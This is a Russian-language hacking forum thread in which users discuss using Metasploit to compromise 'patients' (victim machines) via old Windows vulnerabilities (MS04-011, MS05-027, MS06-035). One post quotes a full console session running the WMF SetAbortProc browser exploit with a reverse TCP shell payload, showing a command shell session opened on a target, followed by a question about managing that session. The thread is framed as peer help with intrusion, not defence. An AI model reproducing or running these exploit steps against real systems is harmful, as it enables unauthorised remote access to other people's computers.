Поиск рулит: http://forum.antichat.ru/search.php?searchid=655706 оффтоп: Один лентяй другому помагает...
Большо спасибо кому не в лом черкнуть пару строк Понял как подключить пациэнта на ms04-011 в Metasploit! Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits?
ИМХО нет, но и его пробиваемость низка на новых системах: тогда уж юзай этот: P.S. Ксати ББ ms05-027 ИМХО уже заменён на ms06-035
quote: msf > use windows/browser/ms06_001_wmf_setabortproc msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1 LHOST => 10.0.0.1 msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ms06_001_wmf_setabortproc) > exploit # Started reverse handler # Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5 # Server started. # Exploit running as background job................ Эксплоит запущен как работа на заднем плане! msf exploit(ms06_001_wmf_setabortproc) > jobs # Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495) .....открыта сесcия с cmd msf exploit(ms06_001_wmf_setabortproc) > jobs Jobs ==== Id Name -- ---- 0 Exploit: windows/browser/ms06_001_wmf_setabortproc Ну и как теперь его переключить на передний план задачу с id=0, где пайп с cmd?